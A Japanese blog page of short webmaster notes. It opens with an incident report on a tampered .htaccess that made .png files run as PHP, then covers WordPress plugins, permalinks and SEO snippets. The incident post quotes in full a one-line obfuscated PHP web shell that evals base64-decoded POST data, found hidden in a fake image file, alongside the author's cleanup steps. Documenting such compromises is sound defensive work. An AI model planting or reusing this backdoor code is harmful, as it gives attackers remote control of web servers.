【メモ】.htaccess改ざん事例(.htaccess/png/eval)※追記あり
正直解決策になっているのかどうかよくわからないのですが日本語のページがほとんどなかったのでメモ。
現象
あるサイトの.htaccessが改ざんされていました。
【元】
AddHandler application/x-httpd-php .html
【改ざん】
AddHandler application/x-httpd-php .png
→「pngファイルをphpととして読み込む」的なもの?
そして.htaccessと同じ階層に、「.****.png」という不可解なファイル。
それをファイルとして開いてみると
<?php ($_=$_POST).($_1=’_').($_4=$$_1).($_4=$_4[$_1]).($_4($$_1)).eval(base64_decode($_4($$_1)));?>
というコードが記載。なにこれこわい。
※あとファイル更新時間でソートをかけたらindex.bak.phpみたいなファイルがありました(消してしまったのでうろ覚え)。
応急処置
色々と情報を集めてみたのですが、POSTデータを実行している云々で実際の挙動に何が起こっているのか正直よくわかりませんでした。
ひとまずの応急処置として
1..****.pngのデータを削除
2.パスワード関連全変更
3..htaccessの修正。
AddHandler application/x-httpd-php .png
→pngをhtmlに修正
4.index.bak.phpの削除
といった対処をしています。
もしなにか分かる情報(「こうした方がいいよ!」とか)があれば教えていただけるとありがたいです!
※追記(2012.5.18 8:44a.m.)
ロリポップのサーバーで起こった事例、という情報をいただいています(2件)。
【WordPressメモ】?img=linkというURLにクローラーが来た
クローラーのログを眺めてたら
■UserAgent
SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)
■URL
www.baka-ke.com/lab/baka-ke_lab.php?img=link
という謎のパラメーターがあったので気になって調べてみました。
?img=linkの原因
調べてたらまさに解答となっているサイトがあったので掲載。
URL末尾に「?img=link」、Googleが重複インデックス | SEOとウェブデザインの情報サイト【Googlezon】
ところで「?img=link」の原因なんですけど、WordPressで作ったサイトにケータイ表示用のプラグインを入れていると付与されるパラメータみたいでした。
というわけで経路を確認してみました。
経路
Ktai styleでモバイルサイトに変換されたもの。
画像を直接表示せずに「リンク表示(URL表示のみ)にする」という部分のURLに付与されていました。
<a id=”inline” href=”/2012/03/12/difference-pc-smartphone-preview-bot/?img=link”>リンクにする</a>
直接「バカ毛実験室」に遷移できるページには画像がなかったのでこのリンクはなかったのですが、どこかでこの「?img=link」を付与してしまうとそのパラメーターをそのまま引っ張って遷移してしまうみたいです。
重複コンテンツは問題ない?
前述の記事から抜粋。
最新のWordPressはがheadに書いてあればデフォルトでrel=”canonical”を出力します。
PCサイトにはcanonical設定されているのでPCの検索結果には影響ないかと思うのですが、モバイルの検索結果がどうなるのかが気になりました。
(モバイル変換されたページに関してはcanonical設定なし)
あとcanonicalに関してgooモバイルとかYahoo!モバイルがどういう対処をするのか、とか。
モバイル検索の影響はそこまで大きくなさそうとも思うのですがひとまず気になったのでメモとして。。。
個別記事に関連情報を掲載してみました(WordPressプラグイン「YARPP」導入)
入れてみたらどうですか、というオススメをいただいたので入れてみました。
個別記事の一番下の部分ですね。
やはり、当サイトも「ユーザビリティ」を考えなくてはいけない時期かと思いまして・・・
全体感
記事全体を見るとこんな感じ。
拡大
・・・!?
結論
広告の欲には勝てなかった。
良かったら関連記事使ってやってください!(棒
※ちなみにYARPPの使い方に関してはこちらが参考になります。
関連記事を自動的に表示する方法 – WordPressのプラグイン | YARPP Yet Another Related Posts Pluginの使い方 | SEOテンプレート比較
wordpressで個別記事が表示できない時に見た単純な解決策(凡ミス編)
本当にどうでもいい凡ミスなのですが、多少の需要もあるかなと思いまして。
(※自分自身、何でこんなミスをしていたのか全く分からないのですが・・・)
症状
全然別のサイトで、ふと見てみたら、記事が個別で確認できないという現象が起こっていました。
解決策を検索したらWordPressのコミュニティが出てきたりしたのですが、結論が
ですか…
ちょっと調べてみます。
いやいやw
いろんな意見を見ていると、DBの問題だったり.htaccessの問題だったりということが記載されていて既に自分ではよく分からないレベル。
今回の解決方法手順
site:で調査してみたところ、インデックスされているページはまだ存在しました。
検索結果に表示されるURLをチェックするときちんと表示される・・・
で、URLを確認したところ、問題は非常に単純なものでした。
WordPressで設定しているURL:http://www.hogehoge.com/
吐き出されるURL:http://www.hogehoge.com/blog/
つまりはパーマリンク設定が間違っていたということです。
ここ。
いつカスタマイズしたのか分からないのですが、おそらくどこかのサイトから引用してきてカスタマイズ設定をしたままURLを確認しなかったのだと思います。
普通に「日付と投稿名」に設定し、戻ったことを確認しました。
こういうのって後から見てみると「どうしてこんな凡ミスを・・・」というようなものなのですが、正直ハマる時はハマるので掲載しておきました。
誰かの参考になれば幸いです。
【客観的な見え方メモ】All in One SEO Packを導入後の説明文の検索結果の違い。
今まで入れてなかったのかよ!という話ですが、一昨日導入しました。
使用方法はこちら:SEO対策に効果的なカスタマイズ – WordPressのプラグイン | All in One SEO Packの使い方 | SEOテンプレート比較
今回導入後のスニペットの違いに関して見てみることにしました。
descriptionの設定有無で客観的にどう見えるかのメモとして更新します。
比較
「Bing 画像まとめ」と検索するとちょうど1位差で導入前と導入後の検索結果が表示されていました。
Yahoo!
上が導入前(設定前)
下が導入後(設定後)
下の方が情報が明確になってますね。
自分が感じたこととしては、結構検索結果を流して読んでいるのかもしれないということ。
どっちでもあまり気にならなかったですw
ただ、じっくり探すケース(いくつかサイトをクリックして目ぼしいものがなくて検索結果で探す場合)などではキレイに記述があるといいのかなと。
流して読むにせよ、じっくり読むにせよキレイになっているに越したことはないので設定しておくべきだとは思うのですが・・・
皆様はいかがでしょうか。
一度客観的に検索結果を見て自分の率直な感想を考えたり書いたりしてみることにより、ユーザー視点の一つを捉えることができるかもしれません。
Categories Google, SEO, WordPress, Yahoo! | Comments (2)